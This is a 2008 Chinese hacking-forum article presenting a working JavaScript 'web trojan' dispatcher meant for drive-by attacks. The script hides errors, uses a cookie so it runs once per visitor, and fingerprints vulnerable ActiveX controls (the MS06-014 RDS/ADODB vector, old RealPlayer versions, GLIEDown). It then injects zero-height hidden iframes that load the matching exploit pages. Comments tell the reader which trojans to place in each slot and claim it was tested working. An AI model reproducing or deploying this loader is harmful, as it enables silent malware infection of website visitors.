您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客编程 >> 正文

网马判断代码
骇客基地 阅读: 时间:2008-10-6 17:33:01 来源:www.hookbase.com
   网马判断代码
文章作者:x14o5
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn
<HTML><BODY>
<script>window.onerror=function(){return true;}</script>
<Script Language="JavaScript">
    var cook = "Silentwm";
    
    function setCookie(name, value, expire)
    {  
        window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
    }

    function getCookie(Name)
    {  
        var search = Name + "=";
        if (window.document.cookie.length > 0)
        {
            offset = window.document.cookie.indexOf(search);
            if (offset != -1)
            {
                offset += search.length;      
              end = window.document.cookie.indexOf(";", offset)      
              if (end == -1)
                end = window.document.cookie.length;
              return unescape(window.document.cookie.substring(offset, end));
             }
         }
      return null;
    }

    function register(name)
    {
        var today = new Date();
        var expires = new Date();
        expires.setTime(today.getTime() + 1000*60*60*24);
        setCookie(cook, name, expires);
    }

    function openWM()
    {
        var c = getCookie(cook);
        if (c != null)
        {
          return;
        }
        
        register(cook);

                document.write("<iframe src=1.htm width=50 height=0><\/iframe>");
                document.write("<iframe src=2.htm width=50 height=0><\/iframe>");
               //只要不卡的网马都可以放近来,比如FLASH...都可以
        
        window.defaultStatus="完成";

        try{ var e;
            var ado=(document.createElement("object"));
            ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
            var as=ado.createobject("Adodb.Stream","")}
        catch(e){};
        finally{
            if(e!="[object Error]"){
                document.write("<iframe width=50 height=0 src=3.htm></iframe>")}  
                                                                                               //这里的功能和上面差不多 最好放MS06014 我测试的时候能执行
            else
            {    
                try{ var j;
                    var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
                catch(j){};
                finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.I"+"ERPCtl.1").PlayerProperty("PRODUCTV"+"ERSION")<="6.0.1"+"4.552")
                                        {document.write('<iframe width=10 height=0 src=4.htm></iframe>')}
                                              //这里放real10.real11...这里是判断啥类型的网马
                         else
                         {
                    document.write('<iframe width=20 height=0 src=5.htm></iframe>')}}}  
                                                                                                             //这里放real11或者real10类型的都可以

                try{ var g;
                    var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
                catch(g){};
                finally{if(g!="[object Error]"){
                    document.write('<iframe width=10 height=0 src=6.htm></iframe>')}}
                                                                                                               //这里放会自动关闭IE的网马...如联众  yahoo 都可以  !

            }}
    }

openWM();
</script>
</BODY></HTML>

测试都OK。。。以上务必按//说明写的放。。。不然不执行不管我事哦 。。。
今天广告
参与评论:
注意事项:
【网马判断代码】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号